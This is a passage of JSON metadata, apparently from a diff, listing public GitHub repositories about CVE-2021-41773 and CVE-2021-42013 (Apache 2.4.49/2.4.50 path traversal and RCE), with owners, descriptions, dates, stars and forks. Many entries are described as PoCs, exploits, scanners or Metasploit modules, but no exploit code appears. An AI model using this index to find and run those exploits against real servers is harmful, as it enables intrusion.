+ "created_at": "2021-10-05T16:18:09Z",
+ "updated_at": "2024-04-24T17:28:30Z",
+ "pushed_at": "2021-10-05T16:48:27Z",
+ "stargazers_count": 9,
+ "watchers_count": 9,
+ "has_discussions": false,
+ "forks_count": 4,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 4,
+ "watchers": 9,
+ "score": 0,
+ "subscribers_count": 3
+ },
+ {
+ "id": 413901787,
+ "name": "CVE-2021-41773",
+ "full_name": "knqyf263\/CVE-2021-41773",
+ "owner": {
+ "login": "knqyf263",
+ "id": 2253692,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/2253692?v=4",
+ "html_url": "https:\/\/github.com\/knqyf263"
+ },
+ "html_url": "https:\/\/github.com\/knqyf263\/CVE-2021-41773",
+ "description": "Path traversal in Apache HTTP Server 2.4.49 (CVE-2021-41773) ",
+ "fork": false,
+ "created_at": "2021-10-05T16:45:41Z",
+ "updated_at": "2024-04-24T17:28:30Z",
+ "pushed_at": "2021-10-06T05:40:34Z",
+ "stargazers_count": 10,
+ "watchers_count": 10,
+ "has_discussions": false,
+ "forks_count": 7,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 7,
+ "watchers": 10,
+ "score": 0,
+ "subscribers_count": 3
+ },
+ {
+ "id": 413916578,
+ "name": "CVE-2021-41773-PoC",
+ "full_name": "ZephrFish\/CVE-2021-41773-PoC",
+ "owner": {
+ "login": "ZephrFish",
+ "id": 5783068,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5783068?v=4",
+ "html_url": "https:\/\/github.com\/ZephrFish"
+ },
+ "html_url": "https:\/\/github.com\/ZephrFish\/CVE-2021-41773-PoC",
+ "description": null,
+ "fork": false,
+ "created_at": "2021-10-05T17:29:49Z",
+ "updated_at": "2024-01-16T16:22:43Z",
+ "pushed_at": "2021-10-06T09:25:38Z",
+ "stargazers_count": 18,
+ "watchers_count": 18,
+ "has_discussions": false,
+ "forks_count": 11,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 11,
+ "watchers": 18,
+ "score": 0,
+ "subscribers_count": 3
+ },
+ {
+ "id": 413916846,
+ "name": "PoC-CVE-2021-41773",
+ "full_name": "iilegacyyii\/PoC-CVE-2021-41773",
+ "owner": {
+ "login": "iilegacyyii",
+ "id": 68760809,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/68760809?v=4",
+ "html_url": "https:\/\/github.com\/iilegacyyii"
+ },
+ "html_url": "https:\/\/github.com\/iilegacyyii\/PoC-CVE-2021-41773",
+ "description": null,
+ "fork": false,
+ "created_at": "2021-10-05T17:30:43Z",
+ "updated_at": "2024-04-02T02:54:31Z",
+ "pushed_at": "2021-11-24T12:57:46Z",
+ "stargazers_count": 47,
+ "watchers_count": 47,
+ "has_discussions": false,
+ "forks_count": 38,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "apache",
+ "cve",
+ "lfi",
+ "poc",
+ "rce"
+ ],
+ "visibility": "public",
+ "forks": 38,
+ "watchers": 47,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 413943505,
+ "name": "CVE-2021-41773",
+ "full_name": "masahiro331\/CVE-2021-41773",
+ "owner": {
+ "login": "masahiro331",
+ "id": 20438853,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/20438853?v=4",
+ "html_url": "https:\/\/github.com\/masahiro331"
+ },
+ "html_url": "https:\/\/github.com\/masahiro331\/CVE-2021-41773",
+ "description": null,
+ "fork": false,
+ "created_at": "2021-10-05T18:56:04Z",
+ "updated_at": "2023-09-28T11:32:03Z",
+ "pushed_at": "2021-10-06T03:43:42Z",
+ "stargazers_count": 2,
+ "watchers_count": 2,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 2,
+ "score": 0,
+ "subscribers_count": 3
+ },
+ {
+ "id": 413969845,
+ "name": "CVE-2021-41773",
+ "full_name": "j4k0m\/CVE-2021-41773",
+ "owner": {
+ "login": "j4k0m",
+ "id": 48088579,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/48088579?v=4",
+ "html_url": "https:\/\/github.com\/j4k0m"
+ },
+ "html_url": "https:\/\/github.com\/j4k0m\/CVE-2021-41773",
+ "description": "Exploitation of CVE-2021-41773 a Directory Traversal in Apache 2.4.49.",
+ "fork": false,
+ "created_at": "2021-10-05T20:30:01Z",
+ "updated_at": "2023-09-28T11:32:03Z",
+ "pushed_at": "2021-10-05T22:06:50Z",
+ "stargazers_count": 13,
+ "watchers_count": 13,
+ "has_discussions": false,
+ "forks_count": 7,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 7,
+ "watchers": 13,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 413972926,
+ "name": "POC-CVE-2021-41773",
+ "full_name": "TishcaTpx\/POC-CVE-2021-41773",
+ "owner": {
+ "login": "TishcaTpx",
+ "id": 91351013,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/91351013?v=4",
+ "html_url": "https:\/\/github.com\/TishcaTpx"
+ },
+ "html_url": "https:\/\/github.com\/TishcaTpx\/POC-CVE-2021-41773",
+ "description": "Poc.py ",
+ "fork": false,
+ "created_at": "2021-10-05T20:41:34Z",
+ "updated_at": "2023-09-28T11:32:03Z",
+ "pushed_at": "2021-10-05T21:29:59Z",
+ "stargazers_count": 7,
+ "watchers_count": 7,
+ "has_discussions": false,
+ "forks_count": 3,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 3,
+ "watchers": 7,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 414013246,
+ "name": "CVE-2021-41773-PoC",
+ "full_name": "lorddemon\/CVE-2021-41773-PoC",
+ "owner": {
+ "login": "lorddemon",
+ "id": 6675738,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/6675738?v=4",
+ "html_url": "https:\/\/github.com\/lorddemon"
+ },
+ "html_url": "https:\/\/github.com\/lorddemon\/CVE-2021-41773-PoC",
+ "description": null,
+ "fork": false,
+ "created_at": "2021-10-05T23:53:48Z",
+ "updated_at": "2023-12-29T05:44:20Z",
+ "pushed_at": "2021-10-06T15:37:23Z",
+ "stargazers_count": 38,
+ "watchers_count": 38,
+ "has_discussions": false,
+ "forks_count": 22,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 22,
+ "watchers": 38,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 414043746,
+ "name": "CVE-2021-41773_CVE-2021-42013",
+ "full_name": "Ls4ss\/CVE-2021-41773_CVE-2021-42013",
+ "owner": {
+ "login": "Ls4ss",
+ "id": 25537761,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/25537761?v=4",
+ "html_url": "https:\/\/github.com\/Ls4ss"
+ },
+ "html_url": "https:\/\/github.com\/Ls4ss\/CVE-2021-41773_CVE-2021-42013",
+ "description": "Apache HTTP Server 2.4.49, 2.4.50 - Path Traversal & RCE",
+ "fork": false,
+ "created_at": "2021-10-06T02:28:41Z",
+ "updated_at": "2023-09-28T11:32:04Z",
+ "pushed_at": "2022-09-09T16:09:11Z",
+ "stargazers_count": 22,
+ "watchers_count": 22,
+ "has_discussions": false,
+ "forks_count": 9,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "apache",
+ "cve",
+ "exploit",
+ "payload",
+ "pentest",
+ "rce"
+ ],
+ "visibility": "public",
+ "forks": 9,
+ "watchers": 22,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 414044140,
+ "name": "CVE-2021-41773",
+ "full_name": "itsecurityco\/CVE-2021-41773",
+ "owner": {
+ "login": "itsecurityco",
+ "id": 1725054,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1725054?v=4",
+ "html_url": "https:\/\/github.com\/itsecurityco"
+ },
+ "html_url": "https:\/\/github.com\/itsecurityco\/CVE-2021-41773",
+ "description": "CVE-2021-41773 POC with Docker",
+ "fork": false,
+ "created_at": "2021-10-06T02:30:40Z",
+ "updated_at": "2024-06-20T12:00:43Z",
+ "pushed_at": "2022-10-07T23:37:10Z",
+ "stargazers_count": 11,
+ "watchers_count": 11,
+ "has_discussions": false,
+ "forks_count": 9,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 9,
+ "watchers": 11,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 414050354,
+ "name": "CVE-2021-41773-PoC",
+ "full_name": "habibiefaried\/CVE-2021-41773-PoC",
+ "owner": {
+ "login": "habibiefaried",
+ "id": 4345690,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/4345690?v=4",
+ "html_url": "https:\/\/github.com\/habibiefaried"
+ },
+ "html_url": "https:\/\/github.com\/habibiefaried\/CVE-2021-41773-PoC",
+ "description": "PoC for CVE-2021-41773 with docker to demonstrate",
+ "fork": false,
+ "created_at": "2021-10-06T03:01:41Z",
+ "updated_at": "2023-09-28T11:32:04Z",
+ "pushed_at": "2021-10-06T05:39:24Z",
+ "stargazers_count": 5,
+ "watchers_count": 5,
+ "has_discussions": false,
+ "forks_count": 4,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 4,
+ "watchers": 5,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 414082287,
+ "name": "CVE-2021-41773-POC",
+ "full_name": "creadpag\/CVE-2021-41773-POC",
+ "owner": {
+ "login": "creadpag",
+ "id": 15526083,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/15526083?v=4",
+ "html_url": "https:\/\/github.com\/creadpag"
+ },
+ "html_url": "https:\/\/github.com\/creadpag\/CVE-2021-41773-POC",
+ "description": "CVE-2021-41773",
+ "fork": false,
+ "created_at": "2021-10-06T05:34:48Z",
+ "updated_at": "2023-09-28T11:32:04Z",
+ "pushed_at": "2022-12-28T17:49:24Z",
+ "stargazers_count": 9,
+ "watchers_count": 9,
+ "has_discussions": false,
+ "forks_count": 5,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 5,
+ "watchers": 9,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 414082633,
+ "name": "cve-2021-41773-nse",
+ "full_name": "TAI-REx\/cve-2021-41773-nse",
+ "owner": {
+ "login": "TAI-REx",
+ "id": 78527947,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/78527947?v=4",
+ "html_url": "https:\/\/github.com\/TAI-REx"
+ },
+ "html_url": "https:\/\/github.com\/TAI-REx\/cve-2021-41773-nse",
+ "description": "CVE-2021-41773.nse",
+ "fork": false,
+ "created_at": "2021-10-06T05:36:22Z",
+ "updated_at": "2021-11-26T18:07:10Z",
+ "pushed_at": "2021-10-06T05:23:16Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 0
+ },
+ {
+ "id": 414108838,
+ "name": "CVE-2021-41773",
+ "full_name": "blasty\/CVE-2021-41773",
+ "owner": {
+ "login": "blasty",
+ "id": 101374,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/101374?v=4",
+ "html_url": "https:\/\/github.com\/blasty"
+ },
+ "html_url": "https:\/\/github.com\/blasty\/CVE-2021-41773",
+ "description": "CVE-2021-41773 playground",
+ "fork": false,
+ "created_at": "2021-10-06T07:17:05Z",
+ "updated_at": "2024-05-11T01:56:23Z",
+ "pushed_at": "2021-10-07T17:56:38Z",
+ "stargazers_count": 208,
+ "watchers_count": 208,
+ "has_discussions": false,
+ "forks_count": 52,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 52,
+ "watchers": 208,
+ "score": 0,
+ "subscribers_count": 6
+ },
+ {
+ "id": 414159388,
+ "name": "CVE-2021-41773",
+ "full_name": "PentesterGuruji\/CVE-2021-41773",
+ "owner": {
+ "login": "PentesterGuruji",
+ "id": 87645282,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/87645282?v=4",
+ "html_url": "https:\/\/github.com\/PentesterGuruji"
+ },
+ "html_url": "https:\/\/github.com\/PentesterGuruji\/CVE-2021-41773",
+ "description": "Path Traversal vulnerability in Apache 2.4.49",
+ "fork": false,
+ "created_at": "2021-10-06T10:04:22Z",
+ "updated_at": "2023-09-28T11:32:04Z",
+ "pushed_at": "2021-10-07T19:39:09Z",
+ "stargazers_count": 2,
+ "watchers_count": 2,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 2,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 414227353,
+ "name": "CVE-2021-41773",
+ "full_name": "jbovet\/CVE-2021-41773",
+ "owner": {
+ "login": "jbovet",
+ "id": 41589,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/41589?v=4",
+ "html_url": "https:\/\/github.com\/jbovet"
+ },
+ "html_url": "https:\/\/github.com\/jbovet\/CVE-2021-41773",
+ "description": "Path traversal and file disclosure vulnerability in Apache HTTP Server 2.4.49 (CVE-2021-41773)",
+ "fork": false,
+ "created_at": "2021-10-06T13:39:57Z",
+ "updated_at": "2023-12-13T13:48:24Z",
+ "pushed_at": "2021-10-06T14:15:45Z",
+ "stargazers_count": 5,
+ "watchers_count": 5,
+ "has_discussions": false,
+ "forks_count": 5,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 5,
+ "watchers": 5,
+ "score": 0,
+ "subscribers_count": 3
+ },
+ {
+ "id": 414239384,
+ "name": "cve-2021-41773",
+ "full_name": "mohwahyudi\/cve-2021-41773",
+ "owner": {
+ "login": "mohwahyudi",
+ "id": 57562836,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/57562836?v=4",
+ "html_url": "https:\/\/github.com\/mohwahyudi"
+ },
+ "html_url": "https:\/\/github.com\/mohwahyudi\/cve-2021-41773",
+ "description": null,
+ "fork": false,
+ "created_at": "2021-10-06T14:12:07Z",
+ "updated_at": "2023-09-28T11:32:05Z",
+ "pushed_at": "2021-10-08T01:55:22Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 2,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 2,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 414241382,
+ "name": "CVE-2021-41773",
+ "full_name": "1nhann\/CVE-2021-41773",
+ "owner": {
+ "login": "1nhann",
+ "id": 76624149,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/76624149?v=4",
+ "html_url": "https:\/\/github.com\/1nhann"
+ },
+ "html_url": "https:\/\/github.com\/1nhann\/CVE-2021-41773",
+ "description": "CVE-2021-41773 的复现",
+ "fork": false,
+ "created_at": "2021-10-06T14:17:31Z",
+ "updated_at": "2024-05-31T03:37:24Z",
+ "pushed_at": "2021-10-08T05:03:10Z",
+ "stargazers_count": 11,
+ "watchers_count": 11,
+ "has_discussions": false,
+ "forks_count": 4,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 4,
+ "watchers": 11,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 414248192,
+ "name": "CVE-2021-41773",
+ "full_name": "ranggaggngntt\/CVE-2021-41773",
+ "owner": {
+ "login": "ranggaggngntt",
+ "id": 57105391,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/57105391?v=4",
+ "html_url": "https:\/\/github.com\/ranggaggngntt"
+ },
+ "html_url": "https:\/\/github.com\/ranggaggngntt\/CVE-2021-41773",
+ "description": null,
+ "fork": false,
+ "created_at": "2021-10-06T14:36:05Z",
+ "updated_at": "2023-09-28T11:32:05Z",
+ "pushed_at": "2022-06-11T13:34:00Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 2,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 2,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 414252359,
+ "name": "CVE-2021-41773",
+ "full_name": "BlueTeamSteve\/CVE-2021-41773",
+ "owner": {
+ "login": "BlueTeamSteve",
+ "id": 550582,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/550582?v=4",
+ "html_url": "https:\/\/github.com\/BlueTeamSteve"
+ },
+ "html_url": "https:\/\/github.com\/BlueTeamSteve\/CVE-2021-41773",
+ "description": "Vulnerable docker images for CVE-2021-41773",
+ "fork": false,
+ "created_at": "2021-10-06T14:47:23Z",
+ "updated_at": "2024-06-20T12:08:47Z",
+ "pushed_at": "2021-10-06T15:07:48Z",
+ "stargazers_count": 21,
+ "watchers_count": 21,
+ "has_discussions": false,
+ "forks_count": 6,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 6,
+ "watchers": 21,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 414256797,
+ "name": "apache_normalize_path",
+ "full_name": "Zeop-CyberSec\/apache_normalize_path",
+ "owner": {
+ "login": "Zeop-CyberSec",
+ "id": 68154603,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/68154603?v=4",
+ "html_url": "https:\/\/github.com\/Zeop-CyberSec"
+ },
+ "html_url": "https:\/\/github.com\/Zeop-CyberSec\/apache_normalize_path",
+ "description": "Metasploit-Framework modules (scanner and exploit) for the CVE-2021-41773 and CVE-2021-42013 (Path Traversal in Apache 2.4.49\/2.4.50)",
+ "fork": false,
+ "created_at": "2021-10-06T14:58:27Z",
+ "updated_at": "2023-09-28T11:32:05Z",
+ "pushed_at": "2021-10-21T18:51:00Z",
+ "stargazers_count": 13,
+ "watchers_count": 13,
+ "has_discussions": false,
+ "forks_count": 4,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 4,
+ "watchers": 13,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 414284449,
+ "name": "CVE-2021-41773",
+ "full_name": "r00tVen0m\/CVE-2021-41773",
+ "owner": {
+ "login": "r00tVen0m",
+ "id": 50659263,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/50659263?v=4",
+ "html_url": "https:\/\/github.com\/r00tVen0m"
+ },
+ "html_url": "https:\/\/github.com\/r00tVen0m\/CVE-2021-41773",
+ "description": null,
+ "fork": false,
+ "created_at": "2021-10-06T16:15:21Z",
+ "updated_at": "2023-09-28T11:32:05Z",
+ "pushed_at": "2021-10-06T19:05:07Z",
+ "stargazers_count": 2,
+ "watchers_count": 2,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 2,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 414347675,
+ "name": "CVE-2021-41773",
+ "full_name": "n3k00n3\/CVE-2021-41773",
+ "owner": {
+ "login": "n3k00n3",
+ "id": 7244777,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/7244777?v=4",
+ "html_url": "https:\/\/github.com\/n3k00n3"
+ },
+ "html_url": "https:\/\/github.com\/n3k00n3\/CVE-2021-41773",
+ "description": "exploit to CVE-2021-41773",
+ "fork": false,
+ "created_at": "2021-10-06T19:39:25Z",
+ "updated_at": "2023-09-28T11:32:06Z",
+ "pushed_at": "2021-10-08T16:32:51Z",
+ "stargazers_count": 2,
+ "watchers_count": 2,
+ "has_discussions": false,
+ "forks_count": 2,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 2,
+ "watchers": 2,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 414350527,
+ "name": "CVE-2021-41773-RCE",
+ "full_name": "fnatalucci\/CVE-2021-41773-RCE",
+ "owner": {
+ "login": "fnatalucci",
+ "id": 5574371,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5574371?v=4",
+ "html_url": "https:\/\/github.com\/fnatalucci"
+ },
+ "html_url": "https:\/\/github.com\/fnatalucci\/CVE-2021-41773-RCE",
+ "description": null,
+ "fork": false,
+ "created_at": "2021-10-06T19:50:33Z",
+ "updated_at": "2023-09-28T11:32:06Z",
+ "pushed_at": "2021-10-06T20:14:27Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 414376599,
+ "name": "CVE-2021-41773",
+ "full_name": "AssassinUKG\/CVE-2021-41773",
+ "owner": {
+ "login": "AssassinUKG",
+ "id": 5285547,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5285547?v=4",
+ "html_url": "https:\/\/github.com\/AssassinUKG"
+ },
+ "html_url": "https:\/\/github.com\/AssassinUKG\/CVE-2021-41773",
+ "description": "Apache 2.4.49",
+ "fork": false,
+ "created_at": "2021-10-06T21:37:18Z",
+ "updated_at": "2023-09-28T11:32:07Z",
+ "pushed_at": "2021-10-20T23:04:06Z",
+ "stargazers_count": 3,
+ "watchers_count": 3,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 3,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 414402542,
+ "name": "Simple-CVE-2021-41773-checker",
+ "full_name": "jheeree\/Simple-CVE-2021-41773-checker",
+ "owner": {
+ "login": "jheeree",
+ "id": 19227591,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/19227591?v=4",
+ "html_url": "https:\/\/github.com\/jheeree"
+ },
+ "html_url": "https:\/\/github.com\/jheeree\/Simple-CVE-2021-41773-checker",
+ "description": "Simple script realizado en bash, para revisión de múltiples hosts para CVE-2021-41773 (Apache)",
+ "fork": false,
+ "created_at": "2021-10-06T23:32:30Z",
+ "updated_at": "2023-09-28T11:32:07Z",
+ "pushed_at": "2021-10-12T03:28:51Z",
+ "stargazers_count": 3,
+ "watchers_count": 3,
+ "has_discussions": false,
+ "forks_count": 3,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 3,
+ "watchers": 3,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 414410579,
+ "name": "CVE-2021-41773",
+ "full_name": "orangmuda\/CVE-2021-41773",
+ "owner": {
+ "login": "orangmuda",
+ "id": 91846073,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/91846073?v=4",
+ "html_url": "https:\/\/github.com\/orangmuda"
+ },
+ "html_url": "https:\/\/github.com\/orangmuda\/CVE-2021-41773",
+ "description": "Apache HTTPd (2.4.49) – Local File Disclosure (LFI)",
+ "fork": false,
+ "created_at": "2021-10-07T00:14:40Z",
+ "updated_at": "2023-11-10T06:30:27Z",
+ "pushed_at": "2021-10-07T00:19:26Z",
+ "stargazers_count": 4,
+ "watchers_count": 4,
+ "has_discussions": false,
+ "forks_count": 2,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "httpd",
+ "remote-code-execution"
+ ],
+ "visibility": "public",
+ "forks": 2,
+ "watchers": 4,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 414425270,
+ "name": "scarce-apache2",
+ "full_name": "HightechSec\/scarce-apache2",
+ "owner": {
+ "login": "HightechSec",
+ "id": 24645706,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/24645706?v=4",
+ "html_url": "https:\/\/github.com\/HightechSec"
+ },
+ "html_url": "https:\/\/github.com\/HightechSec\/scarce-apache2",
+ "description": "A framework for bug hunting or pentesting targeting websites that have CVE-2021-41773 Vulnerability in public ",
+ "fork": false,
+ "created_at": "2021-10-07T01:31:13Z",
+ "updated_at": "2024-06-18T15:48:11Z",
+ "pushed_at": "2021-10-07T08:25:26Z",
+ "stargazers_count": 61,
+ "watchers_count": 61,
+ "has_discussions": false,
+ "forks_count": 18,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "bash-script",
+ "bug-hunting",
+ "cve-2021-41773",
+ "hacktoberfest",
+ "pentesting"
+ ],
+ "visibility": "public",
+ "forks": 18,
+ "watchers": 61,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 414514606,
+ "name": "CVE-2021-41773-exploit",
+ "full_name": "vinhjaxt\/CVE-2021-41773-exploit",
+ "owner": {
+ "login": "vinhjaxt",
+ "id": 8877695,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/8877695?v=4",
+ "html_url": "https:\/\/github.com\/vinhjaxt"
+ },
+ "html_url": "https:\/\/github.com\/vinhjaxt\/CVE-2021-41773-exploit",
+ "description": "CVE-2021-41773, poc, exploit",
+ "fork": false,
+ "created_at": "2021-10-07T08:10:00Z",
+ "updated_at": "2023-09-28T11:32:08Z",
+ "pushed_at": "2021-10-08T04:55:32Z",
+ "stargazers_count": 2,
+ "watchers_count": 2,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 2,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 414536267,
+ "name": "CVE-2021-41773",
+ "full_name": "sixpacksecurity\/CVE-2021-41773",
+ "owner": {
+ "login": "sixpacksecurity",
+ "id": 91971692,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/91971692?v=4",
+ "html_url": "https:\/\/github.com\/sixpacksecurity"
+ },
+ "html_url": "https:\/\/github.com\/sixpacksecurity\/CVE-2021-41773",
+ "description": "CVE-2021-41773 exploit PoC with Docker setup.",
+ "fork": false,
+ "created_at": "2021-10-07T09:21:29Z",
+ "updated_at": "2021-10-07T13:00:21Z",
+ "pushed_at": "2021-10-07T13:00:18Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 414574168,
+ "name": "POC-CVE-2021-41773",
+ "full_name": "Hattan515\/POC-CVE-2021-41773",
+ "owner": {
+ "login": "Hattan515",
+ "id": 92092916,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/92092916?v=4",
+ "html_url": "https:\/\/github.com\/Hattan515"
+ },
+ "html_url": "https:\/\/github.com\/Hattan515\/POC-CVE-2021-41773",
+ "description": null,
+ "fork": false,
+ "created_at": "2021-10-07T11:31:03Z",
+ "updated_at": "2021-10-07T11:52:41Z",
+ "pushed_at": "2021-10-07T11:42:08Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 414581409,
+ "name": "cve-2021-41773",
+ "full_name": "twseptian\/cve-2021-41773",
+ "owner": {
+ "login": "twseptian",
+ "id": 9025301,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/9025301?v=4",
+ "html_url": "https:\/\/github.com\/twseptian"
+ },
+ "html_url": "https:\/\/github.com\/twseptian\/cve-2021-41773",
+ "description": "CVE-2021-41773: Path Traversal Zero-Day in Apache HTTP Server Exploited",
+ "fork": false,
+ "created_at": "2021-10-07T11:55:10Z",
+ "updated_at": "2024-03-04T01:30:32Z",
+ "pushed_at": "2021-10-10T05:19:29Z",
+ "stargazers_count": 3,
+ "watchers_count": 3,
+ "has_discussions": false,
+ "forks_count": 3,
